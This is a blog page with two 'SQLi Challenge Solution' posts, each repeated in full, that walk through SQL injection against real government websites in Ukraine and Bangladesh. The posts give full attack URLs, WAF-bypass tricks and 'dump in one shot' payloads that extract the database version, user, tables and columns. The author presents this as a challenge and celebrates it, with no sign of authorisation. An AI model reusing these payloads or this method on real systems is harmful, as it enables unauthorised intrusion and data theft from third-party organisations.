All Website Pentesting tutorials are here
Tuesday, June 14, 2016
Tuesday, May 31, 2016
Sunday, May 22, 2016
Wednesday, May 18, 2016
Monday, March 7, 2016
SQLi Challenge Solution 4
First of all Helo Guys :D ... Hope You all are fine... Today I'm going to show you the solution of my SQLi Challenge 4 based on MSSQLi..
First of all we'll see my challenge rules/tasks.
Target is dlc2.academy.gov.ua and We've to print Cyber Name , Version , DB , User , Tables and Columns
Now Follow me :D ..
1. We'll find injection point... as you know .asp & .aspx extensions are common in MSSQLi..
So, Now time to use dorks :p
site:dlc2.academy.gov.ua inurl:.asp?id=
First Result : http://dlc2.academy.gov.ua/client/crsprops.asp?Id={F632F6C6-5611-4B6C-AE44-AAADCFA7E2AA}
2. Now We'll Check it's vuln or not and try to balance the query..
Putting Single Quote
http://dlc2.academy.gov.ua/client/crsprops.asp?Id={F632F6C6-5611-4B6C-AE44-AAADCFA7E2AA}'
:D yeahhhhhh it's showing error .........
Now We'll try to balance the query by using comments..
http://dlc2.academy.gov.ua/client/crsprops.asp?Id={F632F6C6-5611-4B6C-AE44-AAADCFA7E2AA}-- - > No Error
http://dlc2.academy.gov.ua/client/crsprops.asp?Id={F632F6C6-5611-4B6C-AE44-AAADCFA7E2AA}'-- - > No Error
O.o no error while using single quote .. it means :D site is string based...
3. Now We'll find total number of columns...
http://dlc2.academy.gov.ua/client/crsprops.asp?Id={F632F6C6-5611-4B6C-AE44-AAADCFA7E2AA}' order by 5-- - > Error
http://dlc2.academy.gov.ua/client/crsprops.asp?Id={F632F6C6-5611-4B6C-AE44-AAADCFA7E2AA}' order by 3-- - > No Error
http://dlc2.academy.gov.ua/client/crsprops.asp?Id={F632F6C6-5611-4B6C-AE44-AAADCFA7E2AA}' order by 4-- - > No Error
:D so, total number of columns are 4..
4. Now We'll use Union Select..
http://dlc2.academy.gov.ua/client/crsprops.asp?Id={F632F6C6-5611-4B6C-AE44-AAADCFA7E2AA}' union select 1,2,3,4-- - > Error
:3 as always int problem...
Now we'll convert all into null..
http://dlc2.academy.gov.ua/client/crsprops.asp?Id={F632F6C6-5611-4B6C-AE44-AAADCFA7E2AA}' union select null,null,null,null-- - > No Error
-_- as what i said....
Now we'll convert one by one them in int..
http://dlc2.academy.gov.ua/client/crsprops.asp?Id={F632F6C6-5611-4B6C-AE44-AAADCFA7E2AA}' union select null,null,null,4-- - > No Error
and now It's showing Vuln Column "4" :D yeahhhhhhhhhhhhhhhh Hurrayyy <3 .........
5. Now time to DIOS...
For Detailed MSSQLi Visit : securityidiots.com
Now I'm going to use The DIOS of master Zen <3
;BEGIN%20DECLARE%20@data%20VARCHAR%288000%29,%20@counter%20int,%20@tblName%20VARCHAR%2850%29,%20@colNames%20VARCHAR%28100%29%20DECLARE%20@tmpTbl%20TABLE%20%28name%20VARCHAR%288000%29%20NOT%20NULL%29%20SET%20@counter%20=%201%20SET%20@data=%27a%27%2bchar%2810%29%2b%27Injected%20by%20Zen%20::%20%27%2b%27char%2810%29%27%2b@@version%2b%27Database%20::%20%27%2bdb_name%28%29%2bchar%2810%29%2bchar%2810%29%20SET%20@tblName%20=%20%27%27%20SET%20@colNames%20=%20%27%27%20WHILE%20@counter%3C=%28SELECT%20COUNT%28table_name%29%20FROM%20INFORMATION_SCHEMA.TABLES%29%20BEGIN%20SET%20@colNames%20=%20%27%27%20SELECT%20@tblName%20=%20table_name%20FROM%20INFORMATION_SCHEMA.TABLES%20WHERE%20TABLE_NAME%20NOT%20IN%20%28select%20name%20from%20@tmpTbl%29%20SELECT%20@colNames%20=%20@colNames%20%2b%27%20:%20%27%2bcolumn_name%20%20FROM%20INFORMATION_SCHEMA.COLUMNS%20WHERE%20TABLE_NAME%20=%20@tblName%20INSERT%20@tmpTbl%20VALUES%28@tblName%29%20SET%20@data=@data%2b%27Table%20:%20%27%2b@tblName%2bchar%2810%29%2b%27Columns%20:%27%2b@colNames%2bchar%2810%29%20SET%20@counter%20=%20@counter%20%2b%201%20END%20SELECT%20@data%20AS%20output%20INTO%20err_dios%20END--
:p Lemme do some changes ... Adding New Line + User
;BEGIN%20DECLARE%20@data%20VARCHAR%288000%29,%20@counter%20int,%20@tblName%20VARCHAR%2850%29,%20@colNames%20VARCHAR%28100%29%20DECLARE%20@tmpTbl%20TABLE%20%28name%20VARCHAR%288000%29%20NOT%20NULL%29%20SET%20@counter%20=%201%20SET%20@data=%2bchar%2810%29%2b%27Injected%20by%20D4RK%204NG31%27%2b%27<%27%2b%27br%27%2b%27>%27%2bchar%2810%29%2b%2bchar%2810%29%2b%27<%27%2b%27br%27%2b%27>%27%2b%27Version%20::%20%27%2b@@version%2bchar%2810%29%2b%27<%27%2b%27br%27%2b%27>%27%2b%27Database%20::%20%27%2bdb_name%28%29%2bchar%2810%29%2b%2bchar%2810%29%2b%27<%27%2b%27br%27%2b%27>%27%2b%27User%20::%20%27%2bcurrent_user%2b%27<%27%2b%27br%27%2b%27>%27%2b%2b%27<%27%2b%27br%27%2b%27>%27%2bchar%2810%29%2b%2bchar%2810%29%2bchar%2810%29%20SET%20@tblName%20=%20%27%27%20SET%20@colNames%20=%20%27%27%20WHILE%20@counter%3C=%28SELECT%20COUNT%28table_name%29%20FROM%20INFORMATION_SCHEMA.TABLES%29%20BEGIN%20SET%20@colNames%20=%20%27%27%20SELECT%20@tblName%20=%20table_name%20FROM%20INFORMATION_SCHEMA.TABLES%20WHERE%20TABLE_NAME%20NOT%20IN%20%28select%20name%20from%20@tmpTbl%29%20SELECT%20@colNames%20=%20@colNames%20%2b%27%20:%20%27%2bcolumn_name%20%20FROM%20INFORMATION_SCHEMA.COLUMNS%20WHERE%20TABLE_NAME%20=%20@tblName%20INSERT%20@tmpTbl%20VALUES%28@tblName%29%20SET%20@data=@data%2b%27Table%20:%20%27%2b@tblName%2b%27<%27%2b%27br%27%2b%27>%27%2b%27Columns%20:%27%2b@colNames%2b%27<%27%2b%27br%27%2b%27>%27%2b%27<%27%2b%27br%27%2b%27>%27%2bchar%2810%29%20SET%20@counter%20=%20@counter%20%2b%201%20END%20SELECT%20@data%20AS%20output%20INTO%20dark_challenge_solution%20END-- -
:D Done
Now time to Inject our DIOS
http://dlc2.academy.gov.ua/client/crsprops.asp?Id={F632F6C6-5611-4B6C-AE44-AAADCFA7E2AA}';BEGIN%20DECLARE%20@data%20VARCHAR%288000%29,%20@counter%20int,%20@tblName%20VARCHAR%2850%29,%20@colNames%20VARCHAR%28100%29%20DECLARE%20@tmpTbl%20TABLE%20%28name%20VARCHAR%288000%29%20NOT%20NULL%29%20SET%20@counter%20=%201%20SET%20@data=%2bchar%2810%29%2b%27Injected%20by%20D4RK%204NG31%27%2b%27<%27%2b%27br%27%2b%27>%27%2bchar%2810%29%2b%2bchar%2810%29%2b%27<%27%2b%27br%27%2b%27>%27%2b%27Version%20::%20%27%2b@@version%2bchar%2810%29%2b%27<%27%2b%27br%27%2b%27>%27%2b%27Database%20::%20%27%2bdb_name%28%29%2bchar%2810%29%2b%2bchar%2810%29%2b%27<%27%2b%27br%27%2b%27>%27%2b%27User%20::%20%27%2bcurrent_user%2b%27<%27%2b%27br%27%2b%27>%27%2b%2b%27<%27%2b%27br%27%2b%27>%27%2bchar%2810%29%2b%2bchar%2810%29%2bchar%2810%29%20SET%20@tblName%20=%20%27%27%20SET%20@colNames%20=%20%27%27%20WHILE%20@counter%3C=%28SELECT%20COUNT%28table_name%29%20FROM%20INFORMATION_SCHEMA.TABLES%29%20BEGIN%20SET%20@colNames%20=%20%27%27%20SELECT%20@tblName%20=%20table_name%20FROM%20INFORMATION_SCHEMA.TABLES%20WHERE%20TABLE_NAME%20NOT%20IN%20%28select%20name%20from%20@tmpTbl%29%20SELECT%20@colNames%20=%20@colNames%20%2b%27%20:%20%27%2bcolumn_name%20%20FROM%20INFORMATION_SCHEMA.COLUMNS%20WHERE%20TABLE_NAME%20=%20@tblName%20INSERT%20@tmpTbl%20VALUES%28@tblName%29%20SET%20@data=@data%2b%27Table%20:%20%27%2b@tblName%2b%27<%27%2b%27br%27%2b%27>%27%2b%27Columns%20:%27%2b@colNames%2b%27<%27%2b%27br%27%2b%27>%27%2b%27<%27%2b%27br%27%2b%27>%27%2bchar%2810%29%20SET%20@counter%20=%20@counter%20%2b%201%20END%20SELECT%20@data%20AS%20output%20INTO%20dark_challenge_solution%20END-- -
Injected ;)
Now we've to dump our DIOS..
http://dlc2.academy.gov.ua/client/crsprops.asp?Id={F632F6C6-5611-4B6C-AE44-AAADCFA7E2AA}' union select null,null,null,(select output from dark_challenge_solution)-- -
Picture here..
:o WTF??? DIOS not injected successfully >:o >:(
-_- No We've to Inject site with manual DIOS
for this I'll use this DIOS Thanks to Foysal Hossain ( Root X Force ) :D
'Injected by D4RK 4NG31'%2b'<'%2b'br>'%2b'<'%2b'br>'%2b'Version :: '%2b@@version%2b'<'%2b'br>'%2b%2b'Database :: '%2bdb_name()%2b%2b'<'%2b'br>'%2b'User :: '%2buser%2b%2b'<'%2b'br>'%2b%2b'<'%2b'br>'%2b(select+char(10)%2b'<'%2b'br>'%2btable_name%2b'::'%2bcolumn_name from information_schema.columns FOR+XML+PATH(''))
Putting DIOS in site and injecting..
http://dlc2.academy.gov.ua/client/crsprops.asp?Id={F632F6C6-5611-4B6C-AE44-AAADCFA7E2AA}' union select null,null,null,'Injected by D4RK 4NG31'%2b'<'%2b'br>'%2b'<'%2b'br>'%2b'Version :: '%2b@@version%2b'<'%2b'br>'%2b%2b'Database :: '%2bdb_name()%2b%2b'<'%2b'br>'%2b'User :: '%2buser%2b%2b'<'%2b'br>'%2b%2b'<'%2b'br>'%2b(select+char(10)%2b'<'%2b'br>'%2btable_name%2b'::'%2bcolumn_name from information_schema.columns FOR+XML+PATH(''))-- -
o.O why not showing...? :3 Ohhhh we've to put " and 1=0 " for error
http://dlc2.academy.gov.ua/client/crsprops.asp?Id={F632F6C6-5611-4B6C-AE44-AAADCFA7E2AA}' and 1=0 union select null,null,null,'Injected by D4RK 4NG31'%2b'<'%2b'br>'%2b'<'%2b'br>'%2b'Version :: '%2b@@version%2b'<'%2b'br>'%2b%2b'Database :: '%2bdb_name()%2b%2b'<'%2b'br>'%2b'User :: '%2buser%2b%2b'<'%2b'br>'%2b%2b'<'%2b'br>'%2b(select+char(10)%2b'<'%2b'br>'%2btable_name%2b'::'%2bcolumn_name from information_schema.columns FOR+XML+PATH(''))-- -
B| Done Site Injected Successfully...
Hope You Like My Tutorial of my Challenge Solution :D ... Thanks for watching
First of all we'll see my challenge rules/tasks.
Target is dlc2.academy.gov.ua and We've to print Cyber Name , Version , DB , User , Tables and Columns
Now Follow me :D ..
1. We'll find injection point... as you know .asp & .aspx extensions are common in MSSQLi..
So, Now time to use dorks :p
site:dlc2.academy.gov.ua inurl:.asp?id=
First Result : http://dlc2.academy.gov.ua/client/crsprops.asp?Id={F632F6C6-5611-4B6C-AE44-AAADCFA7E2AA}
2. Now We'll Check it's vuln or not and try to balance the query..
Putting Single Quote
http://dlc2.academy.gov.ua/client/crsprops.asp?Id={F632F6C6-5611-4B6C-AE44-AAADCFA7E2AA}'
:D yeahhhhhh it's showing error .........
Now We'll try to balance the query by using comments..
http://dlc2.academy.gov.ua/client/crsprops.asp?Id={F632F6C6-5611-4B6C-AE44-AAADCFA7E2AA}-- - > No Error
http://dlc2.academy.gov.ua/client/crsprops.asp?Id={F632F6C6-5611-4B6C-AE44-AAADCFA7E2AA}'-- - > No Error
O.o no error while using single quote .. it means :D site is string based...
3. Now We'll find total number of columns...
http://dlc2.academy.gov.ua/client/crsprops.asp?Id={F632F6C6-5611-4B6C-AE44-AAADCFA7E2AA}' order by 5-- - > Error
http://dlc2.academy.gov.ua/client/crsprops.asp?Id={F632F6C6-5611-4B6C-AE44-AAADCFA7E2AA}' order by 3-- - > No Error
http://dlc2.academy.gov.ua/client/crsprops.asp?Id={F632F6C6-5611-4B6C-AE44-AAADCFA7E2AA}' order by 4-- - > No Error
:D so, total number of columns are 4..
4. Now We'll use Union Select..
http://dlc2.academy.gov.ua/client/crsprops.asp?Id={F632F6C6-5611-4B6C-AE44-AAADCFA7E2AA}' union select 1,2,3,4-- - > Error
:3 as always int problem...
Now we'll convert all into null..
http://dlc2.academy.gov.ua/client/crsprops.asp?Id={F632F6C6-5611-4B6C-AE44-AAADCFA7E2AA}' union select null,null,null,null-- - > No Error
-_- as what i said....
Now we'll convert one by one them in int..
http://dlc2.academy.gov.ua/client/crsprops.asp?Id={F632F6C6-5611-4B6C-AE44-AAADCFA7E2AA}' union select null,null,null,4-- - > No Error
and now It's showing Vuln Column "4" :D yeahhhhhhhhhhhhhhhh Hurrayyy <3 .........
5. Now time to DIOS...
For Detailed MSSQLi Visit : securityidiots.com
Now I'm going to use The DIOS of master Zen <3
;BEGIN%20DECLARE%20@data%20VARCHAR%288000%29,%20@counter%20int,%20@tblName%20VARCHAR%2850%29,%20@colNames%20VARCHAR%28100%29%20DECLARE%20@tmpTbl%20TABLE%20%28name%20VARCHAR%288000%29%20NOT%20NULL%29%20SET%20@counter%20=%201%20SET%20@data=%27a%27%2bchar%2810%29%2b%27Injected%20by%20Zen%20::%20%27%2b%27char%2810%29%27%2b@@version%2b%27Database%20::%20%27%2bdb_name%28%29%2bchar%2810%29%2bchar%2810%29%20SET%20@tblName%20=%20%27%27%20SET%20@colNames%20=%20%27%27%20WHILE%20@counter%3C=%28SELECT%20COUNT%28table_name%29%20FROM%20INFORMATION_SCHEMA.TABLES%29%20BEGIN%20SET%20@colNames%20=%20%27%27%20SELECT%20@tblName%20=%20table_name%20FROM%20INFORMATION_SCHEMA.TABLES%20WHERE%20TABLE_NAME%20NOT%20IN%20%28select%20name%20from%20@tmpTbl%29%20SELECT%20@colNames%20=%20@colNames%20%2b%27%20:%20%27%2bcolumn_name%20%20FROM%20INFORMATION_SCHEMA.COLUMNS%20WHERE%20TABLE_NAME%20=%20@tblName%20INSERT%20@tmpTbl%20VALUES%28@tblName%29%20SET%20@data=@data%2b%27Table%20:%20%27%2b@tblName%2bchar%2810%29%2b%27Columns%20:%27%2b@colNames%2bchar%2810%29%20SET%20@counter%20=%20@counter%20%2b%201%20END%20SELECT%20@data%20AS%20output%20INTO%20err_dios%20END--
:p Lemme do some changes ... Adding New Line + User
;BEGIN%20DECLARE%20@data%20VARCHAR%288000%29,%20@counter%20int,%20@tblName%20VARCHAR%2850%29,%20@colNames%20VARCHAR%28100%29%20DECLARE%20@tmpTbl%20TABLE%20%28name%20VARCHAR%288000%29%20NOT%20NULL%29%20SET%20@counter%20=%201%20SET%20@data=%2bchar%2810%29%2b%27Injected%20by%20D4RK%204NG31%27%2b%27<%27%2b%27br%27%2b%27>%27%2bchar%2810%29%2b%2bchar%2810%29%2b%27<%27%2b%27br%27%2b%27>%27%2b%27Version%20::%20%27%2b@@version%2bchar%2810%29%2b%27<%27%2b%27br%27%2b%27>%27%2b%27Database%20::%20%27%2bdb_name%28%29%2bchar%2810%29%2b%2bchar%2810%29%2b%27<%27%2b%27br%27%2b%27>%27%2b%27User%20::%20%27%2bcurrent_user%2b%27<%27%2b%27br%27%2b%27>%27%2b%2b%27<%27%2b%27br%27%2b%27>%27%2bchar%2810%29%2b%2bchar%2810%29%2bchar%2810%29%20SET%20@tblName%20=%20%27%27%20SET%20@colNames%20=%20%27%27%20WHILE%20@counter%3C=%28SELECT%20COUNT%28table_name%29%20FROM%20INFORMATION_SCHEMA.TABLES%29%20BEGIN%20SET%20@colNames%20=%20%27%27%20SELECT%20@tblName%20=%20table_name%20FROM%20INFORMATION_SCHEMA.TABLES%20WHERE%20TABLE_NAME%20NOT%20IN%20%28select%20name%20from%20@tmpTbl%29%20SELECT%20@colNames%20=%20@colNames%20%2b%27%20:%20%27%2bcolumn_name%20%20FROM%20INFORMATION_SCHEMA.COLUMNS%20WHERE%20TABLE_NAME%20=%20@tblName%20INSERT%20@tmpTbl%20VALUES%28@tblName%29%20SET%20@data=@data%2b%27Table%20:%20%27%2b@tblName%2b%27<%27%2b%27br%27%2b%27>%27%2b%27Columns%20:%27%2b@colNames%2b%27<%27%2b%27br%27%2b%27>%27%2b%27<%27%2b%27br%27%2b%27>%27%2bchar%2810%29%20SET%20@counter%20=%20@counter%20%2b%201%20END%20SELECT%20@data%20AS%20output%20INTO%20dark_challenge_solution%20END-- -
:D Done
Now time to Inject our DIOS
http://dlc2.academy.gov.ua/client/crsprops.asp?Id={F632F6C6-5611-4B6C-AE44-AAADCFA7E2AA}';BEGIN%20DECLARE%20@data%20VARCHAR%288000%29,%20@counter%20int,%20@tblName%20VARCHAR%2850%29,%20@colNames%20VARCHAR%28100%29%20DECLARE%20@tmpTbl%20TABLE%20%28name%20VARCHAR%288000%29%20NOT%20NULL%29%20SET%20@counter%20=%201%20SET%20@data=%2bchar%2810%29%2b%27Injected%20by%20D4RK%204NG31%27%2b%27<%27%2b%27br%27%2b%27>%27%2bchar%2810%29%2b%2bchar%2810%29%2b%27<%27%2b%27br%27%2b%27>%27%2b%27Version%20::%20%27%2b@@version%2bchar%2810%29%2b%27<%27%2b%27br%27%2b%27>%27%2b%27Database%20::%20%27%2bdb_name%28%29%2bchar%2810%29%2b%2bchar%2810%29%2b%27<%27%2b%27br%27%2b%27>%27%2b%27User%20::%20%27%2bcurrent_user%2b%27<%27%2b%27br%27%2b%27>%27%2b%2b%27<%27%2b%27br%27%2b%27>%27%2bchar%2810%29%2b%2bchar%2810%29%2bchar%2810%29%20SET%20@tblName%20=%20%27%27%20SET%20@colNames%20=%20%27%27%20WHILE%20@counter%3C=%28SELECT%20COUNT%28table_name%29%20FROM%20INFORMATION_SCHEMA.TABLES%29%20BEGIN%20SET%20@colNames%20=%20%27%27%20SELECT%20@tblName%20=%20table_name%20FROM%20INFORMATION_SCHEMA.TABLES%20WHERE%20TABLE_NAME%20NOT%20IN%20%28select%20name%20from%20@tmpTbl%29%20SELECT%20@colNames%20=%20@colNames%20%2b%27%20:%20%27%2bcolumn_name%20%20FROM%20INFORMATION_SCHEMA.COLUMNS%20WHERE%20TABLE_NAME%20=%20@tblName%20INSERT%20@tmpTbl%20VALUES%28@tblName%29%20SET%20@data=@data%2b%27Table%20:%20%27%2b@tblName%2b%27<%27%2b%27br%27%2b%27>%27%2b%27Columns%20:%27%2b@colNames%2b%27<%27%2b%27br%27%2b%27>%27%2b%27<%27%2b%27br%27%2b%27>%27%2bchar%2810%29%20SET%20@counter%20=%20@counter%20%2b%201%20END%20SELECT%20@data%20AS%20output%20INTO%20dark_challenge_solution%20END-- -
Injected ;)
Now we've to dump our DIOS..
http://dlc2.academy.gov.ua/client/crsprops.asp?Id={F632F6C6-5611-4B6C-AE44-AAADCFA7E2AA}' union select null,null,null,(select output from dark_challenge_solution)-- -
Picture here..
:o WTF??? DIOS not injected successfully >:o >:(
-_- No We've to Inject site with manual DIOS
for this I'll use this DIOS Thanks to Foysal Hossain ( Root X Force ) :D
'Injected by D4RK 4NG31'%2b'<'%2b'br>'%2b'<'%2b'br>'%2b'Version :: '%2b@@version%2b'<'%2b'br>'%2b%2b'Database :: '%2bdb_name()%2b%2b'<'%2b'br>'%2b'User :: '%2buser%2b%2b'<'%2b'br>'%2b%2b'<'%2b'br>'%2b(select+char(10)%2b'<'%2b'br>'%2btable_name%2b'::'%2bcolumn_name from information_schema.columns FOR+XML+PATH(''))
Putting DIOS in site and injecting..
http://dlc2.academy.gov.ua/client/crsprops.asp?Id={F632F6C6-5611-4B6C-AE44-AAADCFA7E2AA}' union select null,null,null,'Injected by D4RK 4NG31'%2b'<'%2b'br>'%2b'<'%2b'br>'%2b'Version :: '%2b@@version%2b'<'%2b'br>'%2b%2b'Database :: '%2bdb_name()%2b%2b'<'%2b'br>'%2b'User :: '%2buser%2b%2b'<'%2b'br>'%2b%2b'<'%2b'br>'%2b(select+char(10)%2b'<'%2b'br>'%2btable_name%2b'::'%2bcolumn_name from information_schema.columns FOR+XML+PATH(''))-- -
o.O why not showing...? :3 Ohhhh we've to put " and 1=0 " for error
http://dlc2.academy.gov.ua/client/crsprops.asp?Id={F632F6C6-5611-4B6C-AE44-AAADCFA7E2AA}' and 1=0 union select null,null,null,'Injected by D4RK 4NG31'%2b'<'%2b'br>'%2b'<'%2b'br>'%2b'Version :: '%2b@@version%2b'<'%2b'br>'%2b%2b'Database :: '%2bdb_name()%2b%2b'<'%2b'br>'%2b'User :: '%2buser%2b%2b'<'%2b'br>'%2b%2b'<'%2b'br>'%2b(select+char(10)%2b'<'%2b'br>'%2btable_name%2b'::'%2bcolumn_name from information_schema.columns FOR+XML+PATH(''))-- -
B| Done Site Injected Successfully...
Hope You Like My Tutorial of my Challenge Solution :D ... Thanks for watching
Sunday, January 3, 2016
SQLi Challenge Solution 3
So, First of all hello guys ^_^ as always :p
My tasks and rules was this...
As You know MySQL Union Based Injection will not work.
Now we'll think bout error based.. but sadly in this query some words are not acceptable according to my rules..
Now we'll think Xpath will work but it's not for DIOS .. it shows less data and Polygon Injection show few more data than xpath injection.
For this challenge Dual Injection is best it shows most data than all these injections..
and Query of Dual Injection is this :
and(select(!dark-~007)from(select (@@version) dark)angel)--+-
So, let's start...
1. We'll see website is vuln or not
http://bpc.gov.bd/gallery.php?id=6' > error
2. Now We'll check Which comment is working
http://bpc.gov.bd/gallery.php?id=6'--+- > No error it means this comment is working ^_^
3. We'll Execute Dual Injection Query.
http://bpc.gov.bd/gallery.php?id=6' and(select(!dark-~007)from(select (@@version) dark)angel)--+- > WAF -_-
4. We'll Bypass The WAF.. We'll Put \ to know which word is blocked
http://bpc.gov.bd/gallery.php?id=6' and(select(!dark-~007)from(select (@@ver\sion) dark)angel)--+- > no error it means version is blocked
http://bpc.gov.bd/gallery.php?id=6' and(select(!dark-~007)from(select (/*!50000@@version*/) dark)angel)--+- > :) Byassed...
5. First we'll print Cyber name,version,database and user to DIOS...
http://bpc.gov.bd/gallery.php?id=6' and(select(!dark-~007)from(select (concat(/*!50000@@version*/,database(),user()) dark)angel)--+- > Again WAF -_-
http://bpc.gov.bd/gallery.php?id=6' and(select(!dark-~007)from(select (c\oncat(/*!50000@@version*/,dat\abase(),us\er()) dark)angel)--+- > no error now time to bypass these words
http://bpc.gov.bd/gallery.php?id=6' and(select(!dark-~007)from(select (concat (/*!50000@@version*/,/*!50000database*/(),/*!50000user*/())) dark)angel)--+-
Now We'll add Cyber name , Version :: , Database :: , User :: and <br>
http://bpc.gov.bd/gallery.php?id=6' and(select(!dark-~007)from(select (concat (0x3c68323e496e6a6563746564206279204434524b20344e4733313c2f68323e,0x3c703e56657273696f6e203a3a203c2f703e,/*!50000@@version*/,0x3c62723e,0x3c703e4461746162617365203a3a3c2f703e,/*!50000database*/(),0x3c62723e,0x3c703e55736572203a3a3c2f703e,/*!50000user*/(),0x3c62723e)) dark)angel)--+- > Done ! Printed
6. Now We'll Dump Tables and Columns to complete the DIOS...
To Dump Tables and Columns I'll use this Query :
(select(@) from(select(@:=0x00),(select(0) from(information_schema.columns)where(table_schema!=0x696e666f726d6174696f6e5f736368656d61)and(0x00)in(@:=concat (@,0x3c6c693e,table_name,0x203a3a20,column_name))))x)
http://bpc.gov.bd/gallery.php?id=6' and(select(!dark-~007)from(select (concat (0x3c68323e496e6a6563746564206279204434524b20344e4733313c2f68323e,0x3c703e56657273696f6e203a3a203c2f703e,/*!50000@@version*/,0x3c62723e,0x3c703e4461746162617365203a3a3c2f703e,/*!50000database*/(),0x3c62723e,0x3c703e55736572203a3a3c2f703e,/*!50000user*/(),0x3c62723e,(select(@) from(select(@:=0x00),(select(0) from(information_schema.columns)where(table_schema!=0x696e666f726d6174696f6e5f736368656d61)and(0x00)in(@:=concat (@,0x3c6c693e,table_name,0x203a3a20,column_name))))x))) dark)angel)--+- > Blocked by WAF
http://bpc.gov.bd/gallery.php?id=6' and(select(!dark-~007)from(select (concat (0x3c68323e496e6a6563746564206279204434524b20344e4733313c2f68323e,0x3c703e56657273696f6e203a3a203c2f703e,/*!50000@@version*/,0x3c62723e,0x3c703e4461746162617365203a3a3c2f703e,/*!50000database*/(),0x3c62723e,0x3c703e55736572203a3a3c2f703e,/*!50000user*/(),0x3c62723e,(select(@) fr\om(select(@:=0x00),(select(0) fro\m(info\rmation_schema.columns)wh\ere(ta\ble_schema!=0x696e666f726d6174696f6e5f736368656d61)and(0x00)in(@:=concat (@,0x3c6c693e,ta\ble_name,0x203a3a20,colu\mn_name))))x))) dark)angel)--+- > No error now time to bypass these words
http://bpc.gov.bd/gallery.php?id=6' and(select(!dark-~007)from(select (concat (0x3c68323e496e6a6563746564206279204434524b20344e4733313c2f68323e,0x3c703e56657273696f6e203a3a203c2f703e,/*!50000@@version*/,0x3c62723e,0x3c703e4461746162617365203a3a3c2f703e,/*!50000database*/(),0x3c62723e,0x3c703e55736572203a3a3c2f703e,/*!50000user*/(),0x3c62723e,(select(@) /*!50000from*/(select(@:=0x00),(select(0) /*!50000from*/(/*!50000information_schema*/.columns)/*!50000where*/(/*!50000table_schema*/!=0x696e666f726d6174696f6e5f736368656d61)and(0x00)in(@:=concat (@,0x3c6c693e,/*!50000table_name*/,0x203a3a20,/*!50000column_name*/))))x))) dark)angel)--+- > DIOS Bypassed :D
Challenge Solved !
Happy Injecting....
#D4RK_4NG31
My tasks and rules was this...
As You know MySQL Union Based Injection will not work.
Now we'll think bout error based.. but sadly in this query some words are not acceptable according to my rules..
Now we'll think Xpath will work but it's not for DIOS .. it shows less data and Polygon Injection show few more data than xpath injection.
For this challenge Dual Injection is best it shows most data than all these injections..
and Query of Dual Injection is this :
and(select(!dark-~007)from(select (@@version) dark)angel)--+-
So, let's start...
1. We'll see website is vuln or not
http://bpc.gov.bd/gallery.php?id=6' > error
2. Now We'll check Which comment is working
http://bpc.gov.bd/gallery.php?id=6'--+- > No error it means this comment is working ^_^
3. We'll Execute Dual Injection Query.
http://bpc.gov.bd/gallery.php?id=6' and(select(!dark-~007)from(select (@@version) dark)angel)--+- > WAF -_-
4. We'll Bypass The WAF.. We'll Put \ to know which word is blocked
http://bpc.gov.bd/gallery.php?id=6' and(select(!dark-~007)from(select (@@ver\sion) dark)angel)--+- > no error it means version is blocked
http://bpc.gov.bd/gallery.php?id=6' and(select(!dark-~007)from(select (/*!50000@@version*/) dark)angel)--+- > :) Byassed...
5. First we'll print Cyber name,version,database and user to DIOS...
http://bpc.gov.bd/gallery.php?id=6' and(select(!dark-~007)from(select (concat(/*!50000@@version*/,database(),user()) dark)angel)--+- > Again WAF -_-
http://bpc.gov.bd/gallery.php?id=6' and(select(!dark-~007)from(select (c\oncat(/*!50000@@version*/,dat\abase(),us\er()) dark)angel)--+- > no error now time to bypass these words
http://bpc.gov.bd/gallery.php?id=6' and(select(!dark-~007)from(select (concat (/*!50000@@version*/,/*!50000database*/(),/*!50000user*/())) dark)angel)--+-
Now We'll add Cyber name , Version :: , Database :: , User :: and <br>
http://bpc.gov.bd/gallery.php?id=6' and(select(!dark-~007)from(select (concat (0x3c68323e496e6a6563746564206279204434524b20344e4733313c2f68323e,0x3c703e56657273696f6e203a3a203c2f703e,/*!50000@@version*/,0x3c62723e,0x3c703e4461746162617365203a3a3c2f703e,/*!50000database*/(),0x3c62723e,0x3c703e55736572203a3a3c2f703e,/*!50000user*/(),0x3c62723e)) dark)angel)--+- > Done ! Printed
6. Now We'll Dump Tables and Columns to complete the DIOS...
To Dump Tables and Columns I'll use this Query :
(select(@) from(select(@:=0x00),(select(0) from(information_schema.columns)where(table_schema!=0x696e666f726d6174696f6e5f736368656d61)and(0x00)in(@:=concat (@,0x3c6c693e,table_name,0x203a3a20,column_name))))x)
http://bpc.gov.bd/gallery.php?id=6' and(select(!dark-~007)from(select (concat (0x3c68323e496e6a6563746564206279204434524b20344e4733313c2f68323e,0x3c703e56657273696f6e203a3a203c2f703e,/*!50000@@version*/,0x3c62723e,0x3c703e4461746162617365203a3a3c2f703e,/*!50000database*/(),0x3c62723e,0x3c703e55736572203a3a3c2f703e,/*!50000user*/(),0x3c62723e,(select(@) from(select(@:=0x00),(select(0) from(information_schema.columns)where(table_schema!=0x696e666f726d6174696f6e5f736368656d61)and(0x00)in(@:=concat (@,0x3c6c693e,table_name,0x203a3a20,column_name))))x))) dark)angel)--+- > Blocked by WAF
http://bpc.gov.bd/gallery.php?id=6' and(select(!dark-~007)from(select (concat (0x3c68323e496e6a6563746564206279204434524b20344e4733313c2f68323e,0x3c703e56657273696f6e203a3a203c2f703e,/*!50000@@version*/,0x3c62723e,0x3c703e4461746162617365203a3a3c2f703e,/*!50000database*/(),0x3c62723e,0x3c703e55736572203a3a3c2f703e,/*!50000user*/(),0x3c62723e,(select(@) fr\om(select(@:=0x00),(select(0) fro\m(info\rmation_schema.columns)wh\ere(ta\ble_schema!=0x696e666f726d6174696f6e5f736368656d61)and(0x00)in(@:=concat (@,0x3c6c693e,ta\ble_name,0x203a3a20,colu\mn_name))))x))) dark)angel)--+- > No error now time to bypass these words
http://bpc.gov.bd/gallery.php?id=6' and(select(!dark-~007)from(select (concat (0x3c68323e496e6a6563746564206279204434524b20344e4733313c2f68323e,0x3c703e56657273696f6e203a3a203c2f703e,/*!50000@@version*/,0x3c62723e,0x3c703e4461746162617365203a3a3c2f703e,/*!50000database*/(),0x3c62723e,0x3c703e55736572203a3a3c2f703e,/*!50000user*/(),0x3c62723e,(select(@) /*!50000from*/(select(@:=0x00),(select(0) /*!50000from*/(/*!50000information_schema*/.columns)/*!50000where*/(/*!50000table_schema*/!=0x696e666f726d6174696f6e5f736368656d61)and(0x00)in(@:=concat (@,0x3c6c693e,/*!50000table_name*/,0x203a3a20,/*!50000column_name*/))))x))) dark)angel)--+- > DIOS Bypassed :D
Challenge Solved !
Happy Injecting....
#D4RK_4NG31
Subscribe to:
